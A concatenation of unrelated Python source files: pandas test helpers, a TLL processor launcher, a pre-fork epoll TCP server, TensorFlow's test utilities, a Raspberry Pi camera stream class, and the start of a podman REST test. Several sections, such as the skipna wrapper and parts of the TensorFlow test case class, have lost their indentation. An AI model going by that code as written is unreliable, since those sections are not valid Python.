    """DataFrame subclass used to test that metadata propagates through ops."""

    _metadata = ["testattr"]

    @property
    def _constructor(self):
        # keep the subclass through DataFrame-returning operations
        return SubclassedDataFrame

    @property
    def _constructor_sliced(self):
        # row/column slices yield the paired Series subclass
        return SubclassedSeries
class SubclassedCategorical(Categorical):
    """Categorical subclass used to test subclass preservation."""

    @property
    def _constructor(self):
        return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
    """
    Convert list of CSV rows to single CSV-formatted string for current OS.

    This method is used for creating expected value of to_csv() method.

    Parameters
    ----------
    rows_list : List[str]
        Each element represents the row of csv.

    Returns
    -------
    str
        Expected output of to_csv() in current OS.
    """
    terminator = os.linesep
    return terminator.join(rows_list) + terminator
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
    """
    Helper function to mark pytest.raises that have an external error message.

    Parameters
    ----------
    expected_exception : Exception
        Expected error to raise.

    Returns
    -------
    Callable
        Regular `pytest.raises` function with `match` equal to `None`.
    """
    # local import keeps pytest out of the module's hard dependencies
    import pytest
    return pytest.raises(expected_exception, match=None)
# (function, cython-name) pairs from pandas' SelectionMixin; used below to map
# NDFrame method names to their cython-table implementations.
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
    """
    Combine frame, functions from SelectionMixin._cython_table
    keys and expected result.

    Parameters
    ----------
    ndframe : DataFrame or Series
    func_names_and_expected : Sequence of two items
        The first item is a name of a NDFrame method ('sum', 'prod') etc.
        The second item is the expected return value.

    Returns
    -------
    list
        List of three items (DataFrame, function, expected result)
    """
    results = []
    for func_name, expected in func_names_and_expected:
        results.append((ndframe, func_name, expected))
        results.extend(
            (ndframe, func, expected)
            for func, name in cython_table
            if name == func_name
        )
    return results
def get_op_from_name(op_name: str) -> Callable:
    """
    The operator function for a given op name.

    Parameters
    ----------
    op_name : str
        The op name, in form of "add" or "__add__".

    Returns
    -------
    function
        A function performing the operation.
    """
    stripped = op_name.strip("_")
    if hasattr(operator, stripped):
        return getattr(operator, stripped)
    # Assume it is the reverse operator: "radd" -> operator.add with
    # the operands swapped.
    rop = getattr(operator, stripped[1:])
    return lambda x, y: rop(y, x)
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
    """Identity indexer: exercise obj[...] access directly."""
    return x
def setitem(x):
    """Identity indexer: exercise obj[...] assignment directly."""
    return x
def loc(x):
    """Return the label-based indexer of x."""
    return x.loc
def iloc(x):
    """Return the positional indexer of x."""
    return x.iloc
def at(x):
    """Return the scalar label-based accessor of x."""
    return x.at
def iat(x):
    """Return the scalar positional accessor of x."""
    return x.iat
|
main.py | #!/usr/bin/env python3
# vim: sts=4 sw=4 et
import argparse
import logging, logging.config
import signal
import sys
import threading
import tll.logger
from tll.config import Config, Url
from tll.channel import Context
from tll.processor import *
# CLI: a single positional config path/URL plus repeatable -D KEY=VALUE
# overrides that are applied on top of the loaded configuration in main().
parser = argparse.ArgumentParser(description="Run TLL processor")
parser.add_argument("config", type=str, help="configuration file")
parser.add_argument("-D", dest='defs', metavar='KEY=VALUE', action='append', default=[], help='extra config variables')
def main():
    """Parse CLI arguments, load the configuration, apply -D overrides and run."""
    tll.logger.init()
    args = parser.parse_args()
    # default to the yaml loader when no scheme is given
    if '://' not in args.config:
        args.config = 'yaml://' + args.config
    cfg = Config.load(args.config)
    for d in args.defs:
        key, sep, value = d.partition('=')
        if not sep:
            print(f"Invalid KEY=VALUE parameter: '{d}'")
            sys.exit(1)
        cfg[key] = value
    cfg.process_imports('processor.include')
    return run(cfg)
def run(cfg):
    """Configure logging, build the channel context, start worker threads and
    run the processor main loop until SIGINT/SIGTERM closes it.
    """
    try:
        tll.logger.configure(cfg.sub('logger', throw=False))
    finally:
        logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-7s %(name)s: %(message)s')
    context = Context()
    context.register_loader()
    # the loader channel must stay referenced so that modules/aliases it
    # registers remain available for the processor's lifetime
    loader = None
    mcfg = cfg.sub("processor.module", throw=False)
    acfg = cfg.sub("processor.alias", throw=False)
    if mcfg is not None or acfg is not None:
        lurl = Url()
        lurl.proto = "loader"
        lurl['tll.internal'] = 'yes'
        if mcfg: lurl['module'] = mcfg.copy()
        if acfg: lurl['alias'] = acfg.copy()
        loader = context.Channel(lurl)
    p = Processor(cfg, context=context)
    p.open()
    # closing the processor makes p.run() (and the workers) return
    signal.signal(signal.SIGINT, lambda *a: p.close())
    signal.signal(signal.SIGTERM, lambda *a: p.close())

    def worker_main(worker):
        # each worker loop runs in its own thread
        worker.open()
        worker.run()

    threads = []
    for w in p.workers:
        # FIX: the inner thread function was previously also named `run`,
        # shadowing this function
        t = threading.Thread(target=worker_main, args=(w,))
        t.start()
        threads.append(t)
    p.run()
    # BUG FIX: worker threads were never joined, so the process could exit
    # while workers were still shutting down
    for t in threads:
        t.join()
# Script entry point.
if __name__ == "__main__":
    main()
|
forcecore.py | #! /usr/bin/env python
import os
import threading
import select
import socket
# NOTE(review): legacy Python 2 module (print statements); kept byte-identical.
class ds_forkcore(object):
    # Pre-fork TCP server: one listening socket shared by several forked
    # worker processes, each running a pool of epoll accept threads.
    #init function
    def __init__(self,worker,port=3333):
        # shared listening socket; SO_REUSEADDR allows quick restarts
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
        s.bind(("",port))
        s.listen(50000)
        self.s=s
        # worker: callable invoked as worker(conn, addr) per accepted connection
        self.worker=worker
        self.ds_process()
    #async IO(epoll)
    def ds_epoll(self):
        # edge-triggered epoll loop on the listening socket: each readiness
        # event accepts one connection and hands it to the worker callback
        epoll=select.epoll()
        epoll.register(self.s.fileno(),select.EPOLLIN|select.EPOLLET)
        while 1:
            epoll_list=epoll.poll()
            for fd,_events in epoll_list:
                if fd==self.s.fileno():
                    conn,addr=self.s.accept()
                    print "Current process's pid is "+str(os.getpid())
                    self.worker(conn,addr)
    #multi_thread
    def ds_thread(self,thread_num=100):
        # NOTE(review): t.join() here blocks on a thread whose ds_epoll loop
        # never returns, so thread creation effectively stalls after the first
        # iteration — presumably joining all threads after the loop was
        # intended; confirm before relying on thread_num.
        for _ in range(0,thread_num):
            t=threading.Thread(target=self.ds_epoll)
            t.setDaemon(1)
            t.start()
            t.join()
    #multi_process
    def ds_process(self,child_process_num=8):
        pid=os.getpid()
        print "Main process start, pid is "+str(pid)
        # only the original parent forks (pid guard); each child drops into
        # its thread pool and never returns from ds_thread
        for _ in range(0,child_process_num):
            if pid==os.getpid():
                if os.fork():
                    pass
                else:
                    print "Worker process start, pid is "+str(os.getpid())
                    self.ds_thread()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def gpu_device_name():
  """Returns the name of a GPU device if available or the empty string."""
  for device in device_lib.list_local_devices():
    if device.device_type in ("GPU", "SYCL"):
      return device.name
  return ""
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  graph_def = graph.as_graph_def()
  actual_ops = {}
  for node in graph_def.node:
    if node.name not in expected_ops:
      continue
    if expected_ops[node.name] != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (node.name, expected_ops[node.name], node.op))
    actual_ops[node.name] = node
  if set(expected_ops.keys()) != set(actual_ops.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), actual_ops.keys()))
  return actual_ops
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering of
  nodes, attrs, and control inputs. Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
      values that appear in V2 checkpoints.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  for label, value in (("actual", actual), ("expected", expected)):
    if not isinstance(value, graph_pb2.GraphDef):
      raise TypeError("Expected tf.GraphDef for %s, got %s" %
                      (label, type(value).__name__))
  if checkpoint_v2:
    _strip_checkpoint_v2_randomized(actual)
    _strip_checkpoint_v2_randomized(expected)
  diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
                                                expected.SerializeToString())
  if diff:
    raise AssertionError(compat.as_str(diff))
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
# (a "_temp_<32 hex chars>/part" string produced for V2 sharded saves)
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
  """Removes node attrs whose single string tensor value matches the V2
  sharded-save temp-name pattern, in place."""
  for node in graph_def.node:
    doomed = []
    for attr_key in node.attr:
      tensor_value = node.attr[attr_key].tensor
      if not tensor_value or len(tensor_value.string_val) != 1:
        continue
      string_value = tensor_value.string_val[0]
      if string_value and re.match(_SHARDED_SAVE_OP_PATTERN, string_value):
        doomed.append(attr_key)
    for attr_key in doomed:
      del node.attr[attr_key]
def IsGoogleCudaEnabled():
  """Delegates to the native pywrap_tensorflow binding of the same name."""
  return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
  """Delegates to the native pywrap_tensorflow binding of the same name."""
  return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation that moves the trailing channel axis to index 1
  permutations = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if isinstance(input_tensor, ops.Tensor):
    return array_ops.transpose(input_tensor,
                               permutations[input_tensor.shape.ndims])
  perm = permutations[len(input_tensor)]
  return [input_tensor[axis] for axis in perm]
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor rank -> permutation that moves the channel axis (index 1) to the end
  permutations = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if isinstance(input_tensor, ops.Tensor):
    return array_ops.transpose(input_tensor,
                               permutations[input_tensor.shape.ndims])
  perm = permutations[len(input_tensor)]
  return [input_tensor[axis] for axis in perm]
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
ops.reset_default_graph()
ops.get_default_graph().seed = random_seed.DEFAULT_GRAPH_SEED
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, accross different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
                 graph=None,
                 config=None,
                 use_gpu=False,
                 force_gpu=False):
  """Returns a TensorFlow Session for use in executing tests.

  This method should be used for all functional tests.

  This method behaves differently than session.Session: for performance
  reasons `test_session` will by default (if `graph` is None) reuse the same
  session across tests. This means you may want to either call the function
  `reset_default_graph()` before tests, or if creating an explicit new graph,
  pass it here (simply setting it with `as_default()` won't do it), which will
  trigger the creation of a new session.

  Use the `use_gpu` and `force_gpu` options to control where ops are run. If
  `force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
  is True, TensorFlow tries to run as many ops on the GPU as possible. If both
  `force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.

  Example:

    class MyOperatorTest(test_util.TensorFlowTestCase):
      def testMyOperator(self):
        with self.test_session(use_gpu=True):
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()

  Args:
    graph: Optional graph to use during the returned session.
    config: An optional config_pb2.ConfigProto to use to configure the
      session.
    use_gpu: If True, attempt to run as many ops as possible on GPU.
    force_gpu: If True, pin all ops to `/gpu:0`.

  Returns:
    A Session object that should be used as a context manager to surround
    the graph building and execution code in a test case.
  """
  if self.id().endswith(".test_session"):
    self.skipTest("Not a test.")

  def prepare_config(config):
    """Returns a config, forcing explicit placement when force_gpu is set.

    Args:
      config: An optional config_pb2.ConfigProto to use to configure the
        session.

    Returns:
      A config_pb2.ConfigProto object.
    """
    if config is None:
      config = config_pb2.ConfigProto()
      config.allow_soft_placement = not force_gpu
      # Cap GPU memory so several test processes can share one device.
      config.gpu_options.per_process_gpu_memory_fraction = 0.3
    elif force_gpu and config.allow_soft_placement:
      # BUG FIX: protobuf Message.CopyFrom() returns None, so the previous
      # `config = config_pb2.ConfigProto().CopyFrom(config)` left `config`
      # set to None and the next attribute write raised AttributeError.
      # Copy into a named message instead.
      config_copy = config_pb2.ConfigProto()
      config_copy.CopyFrom(config)
      config = config_copy
      config.allow_soft_placement = False
    # Don't perform optimizations for tests so we don't inadvertently run
    # gpu ops on cpu
    config.graph_options.optimizer_options.opt_level = -1
    return config

  if graph is None:
    # Reuse (or lazily create) the cached session for speed.
    if self._cached_session is None:
      self._cached_session = session.Session(
          graph=None, config=prepare_config(config))
    sess = self._cached_session
    with sess.graph.as_default(), sess.as_default():
      if force_gpu:
        # Use the name of an actual device if one is detected, or '/gpu:0'
        # otherwise
        gpu_name = gpu_device_name()
        if not gpu_name:
          gpu_name = "/gpu:0"
        with sess.graph.device(gpu_name):
          yield sess
      elif use_gpu:
        yield sess
      else:
        with sess.graph.device("/cpu:0"):
          yield sess
  else:
    # An explicit graph always gets a fresh, properly closed session.
    with session.Session(graph=graph, config=prepare_config(config)) as sess:
      if force_gpu:
        # Use the name of an actual device if one is detected, or '/gpu:0'
        # otherwise
        gpu_name = gpu_device_name()
        if not gpu_name:
          gpu_name = "/gpu:0"
        with sess.graph.device(gpu_name):
          yield sess
      elif use_gpu:
        yield sess
      else:
        with sess.graph.device("/cpu:0"):
          yield sess
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
  """Returns a thread wrapper that asserts `target` completes successfully.

  All threads in test cases should be created through this method so a
  failing target (or an assertion made inside it) fails the test instead
  of being silently dropped.

  Args:
    target: Callable to execute in the thread.
    args: Positional argument tuple for target. Defaults to ().
    kwargs: Keyword argument dict for target. Defaults to {}.

  Returns:
    A threading.Thread-like wrapper supporting start() and join().
  """
  thread = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
  self._threads.append(thread)
  return thread
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
  """Asserts that two floats are near each other.

  Fails the test unless |f1 - f2| <= err.

  Args:
    f1: A float value.
    f2: A float value.
    err: A float tolerance.
    msg: An optional string appended to the failure message.
  """
  suffix = " (%s)" % msg if msg is not None else ""
  self.assertTrue(
      math.fabs(f1 - f2) <= err,
      "%f != %f +/- %f%s" % (f1, f2, err, suffix))
def assertArrayNear(self, farray1, farray2, err):
  """Asserts that two equal-length float sequences are element-wise near.

  First checks the two sequences have equal length, then checks
  |x - y| <= err for every aligned pair.

  Args:
    farray1: a list of float values.
    farray2: a list of float values.
    err: a float tolerance.
  """
  self.assertEqual(len(farray1), len(farray2))
  for left, right in zip(farray1, farray2):
    self.assertNear(float(left), float(right), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
  """Asserts that two numpy arrays have near values.

  Args:
    ndarray1: a numpy ndarray.
    ndarray2: a numpy ndarray.
    err: a float. The maximum absolute difference allowed.
  """
  # Delegates to _NDArrayNear, which compares the Euclidean norm of the
  # difference against err.
  self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
  """Asserts that two numpy arrays have near values.

  Args:
    a: a numpy ndarray or anything that can be converted to one.
    b: a numpy ndarray or anything that can be converted to one.
    rtol: relative tolerance.
    atol: absolute tolerance.
  """
  a = self._GetNdArray(a)
  b = self._GetNdArray(b)
  self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
                   (a.shape, b.shape))
  if np.allclose(a, b, rtol=rtol, atol=atol):
    return
  # np.allclose compares |a - b| against atol + rtol * |b| element-wise;
  # print exactly which elements violate that (or mismatch on NaN) before
  # delegating the actual failure message to numpy.
  mismatch = np.logical_or(
      np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
  if a.ndim:
    where = np.where(mismatch)
    x = a[where]
    y = b[where]
    print("not close where = ", where)
  else:
    # np.where is broken for scalars
    x, y = a, b
  print("not close lhs = ", x)
  print("not close rhs = ", y)
  print("not close dif = ", np.abs(x - y))
  print("not close tol = ", atol + rtol * np.abs(y))
  print("dtype = %s, shape = %s" % (a.dtype, a.shape))
  np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
                                  a,
                                  b,
                                  rtol=1e-6,
                                  atol=1e-6,
                                  float_rtol=1e-6,
                                  float_atol=1e-6,
                                  half_rtol=1e-3,
                                  half_atol=1e-3):
  """Like assertAllClose, but widens tolerances for low-precision dtypes.

  float32/complex64 inputs use at least float_rtol/float_atol, and float16
  inputs use at least half_rtol/half_atol (1e-3 by default).

  Args:
    a: a numpy ndarray or anything that can be converted to one.
    b: a numpy ndarray or anything that can be converted to one.
    rtol: relative tolerance.
    atol: absolute tolerance.
    float_rtol: relative tolerance for float32.
    float_atol: absolute tolerance for float32.
    half_rtol: relative tolerance for float16.
    half_atol: absolute tolerance for float16.
  """
  a = self._GetNdArray(a)
  b = self._GetNdArray(b)
  dtypes = (a.dtype, b.dtype)
  if any(dt == np.float32 or dt == np.complex64 for dt in dtypes):
    rtol = max(rtol, float_rtol)
    atol = max(atol, float_atol)
  if any(dt == np.float16 for dt in dtypes):
    rtol = max(rtol, half_rtol)
    atol = max(atol, half_atol)
  self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
  """Asserts that two numpy arrays have the same values.

  For float32/float64 inputs, aligned NaNs count as equal.

  Args:
    a: a numpy ndarray or anything that can be converted to one.
    b: a numpy ndarray or anything that can be converted to one.
  """
  a = self._GetNdArray(a)
  b = self._GetNdArray(b)
  self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
                   (a.shape, b.shape))
  same = (a == b)
  if a.dtype == np.float32 or a.dtype == np.float64:
    # NaN != NaN, but two aligned NaNs should still be treated as equal.
    same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
  if np.all(same):
    return
  # Print exactly which elements differ before delegating the failure
  # message to numpy.
  diff = np.logical_not(same)
  if a.ndim:
    where = np.where(diff)
    x = a[where]
    y = b[where]
    print("not equal where = ", where)
  else:
    # np.where is broken for scalars
    x, y = a, b
  print("not equal lhs = ", x)
  print("not equal rhs = ", y)
  np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
                                   expected_err_re_or_predicate):
  """Returns a context manager to enclose code expected to raise an exception.

  If the exception is an OpError, the op stack is also included in the message
  predicate search.

  Args:
    exception_type: The expected type of exception that should be raised.
    expected_err_re_or_predicate: If this is callable, it should be a function
      of one argument that inspects the passed-in exception and
      returns True (success) or False (please fail the test). Otherwise, the
      error message is expected to match this regular expression partially.

  Returns:
    A context manager to surround code that is expected to raise an
    exception.
  """
  if callable(expected_err_re_or_predicate):
    predicate = expected_err_re_or_predicate
  else:

    def predicate(e):
      # For OpErrors, extend the searched text with the chain of
      # originating ops so the regex can match anywhere in the op stack.
      err_str = e.message if isinstance(e, errors.OpError) else str(e)
      op = e.op if isinstance(e, errors.OpError) else None
      while op is not None:
        err_str += "\nCaused by: " + op.name
        op = op._original_op  # pylint: disable=protected-access
      logging.info("Searching within error strings: '%s' within '%s'",
                   expected_err_re_or_predicate, err_str)
      return re.search(expected_err_re_or_predicate, err_str)

  try:
    yield
    # Reaching this line means the enclosed body did not raise at all.
    # NOTE(review): the AssertionError raised by self.fail() here is itself
    # caught by the except clause below and re-wrapped unless exception_type
    # is AssertionError — confirm whether that rewrapping is intended.
    self.fail(exception_type.__name__ + " not raised")
  except Exception as e:  # pylint: disable=broad-except
    if not isinstance(e, exception_type) or not predicate(e):
      raise AssertionError("Exception of type %s: %s" % (str(type(e)),
                                                         str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
  """Returns a context manager asserting that an errors.OpError is raised.

  Shorthand for assertRaisesWithPredicateMatch(errors.OpError, ...).
  """
  return self.assertRaisesWithPredicateMatch(errors.OpError,
                                             expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
  """Asserts that a Numpy ndarray and a TensorFlow tensor share a shape.

  Args:
    np_array: A Numpy ndarray or Numpy scalar.
    tf_tensor: A Tensor.

  Raises:
    TypeError: If either argument has the wrong type.
  """
  if not isinstance(np_array, (np.ndarray, np.generic)):
    raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
  if not isinstance(tf_tensor, ops.Tensor):
    raise TypeError("tf_tensor must be a Tensor")
  expected_shape = list(np_array.shape)
  self.assertAllEqual(expected_shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
  """Asserts that the two given devices canonicalize to the same name.

  Args:
    device1: A string device name or TensorFlow `DeviceSpec` object.
    device2: A string device name or TensorFlow `DeviceSpec` object.
  """
  canonical1 = pydev.canonical_name(device1)
  canonical2 = pydev.canonical_name(device2)
  self.assertEqual(canonical1, canonical2,
                   "Devices %s and %s are not equal" % (canonical1, canonical2))
# Fix Python 3 compatibility issues
# These aliases let test code written against the Python 2 method names keep
# working on Python 3, where unittest renamed them.
if six.PY3:
  # pylint: disable=invalid-name

  # Silence a deprecation warning
  assertRaisesRegexp = googletest.TestCase.assertRaisesRegex

  # assertItemsEqual is assertCountEqual as of 3.2.
  assertItemsEqual = googletest.TestCase.assertCountEqual

  # pylint: enable=invalid-name
|
pivideostream.py | from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class PiVideoStream:
    """Threaded Raspberry Pi camera reader.

    Continuously captures BGR frames on a daemon thread so read() always
    returns the most recent frame without blocking on the camera.
    """

    def __init__(self, resolution=(320, 240), framerate=32, **kwargs):
        """Configures the camera and prepares the continuous capture stream."""
        self.camera = PiCamera()
        self.camera.resolution = resolution
        self.camera.framerate = framerate
        self.camera.led = False
        # Night exposure mode with positive compensation for dim scenes.
        self.camera.exposure_mode = 'night'
        self.camera.exposure_compensation = 25
        # Apply any extra PiCamera attributes supplied by the caller
        # (refer to the PiCamera docs for valid names).
        for (attr_name, attr_value) in kwargs.items():
            setattr(self.camera, attr_name, attr_value)
        self.rawCapture = PiRGBArray(self.camera, size=resolution)
        self.stream = self.camera.capture_continuous(self.rawCapture,
                                                     format="bgr", use_video_port=True)
        # Latest captured frame plus the flag the worker thread polls.
        self.frame = None
        self.stopped = False

    def start(self):
        """Launches the background capture thread and returns self."""
        worker = Thread(target=self.update, args=())
        worker.daemon = True
        worker.start()
        return self

    def update(self):
        """Worker loop: keep only the newest frame until stop() is called."""
        for capture in self.stream:
            self.frame = capture.array
            self.rawCapture.truncate(0)
            if self.stopped:
                # Release the stream and the camera before leaving the thread.
                self.stream.close()
                self.rawCapture.close()
                self.camera.close()
                return

    def read(self):
        """Returns the most recently captured frame (None before the first)."""
        return self.frame

    def stop(self):
        """Signals the worker thread to shut down and release the camera."""
        self.stopped = True
|
test_rest_v2_0_0.py | import json
import subprocess
import sys
import time
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from test.apiv2.rest_api import Podman
# Address the locally spawned `podman system service` listens on.
PODMAN_URL = "http://localhost:8080"
def _url(path):
    """Prefix *path* with the versioned libpod API root on the test service."""
    return f"{PODMAN_URL}/v2.0.0/libpod{path}"
def ctnr(path):
    """Format *path* with the Id of the first known container.

    Queries the service for all containers and substitutes the first
    container's Id into the `{}` placeholder in *path*. On failure the
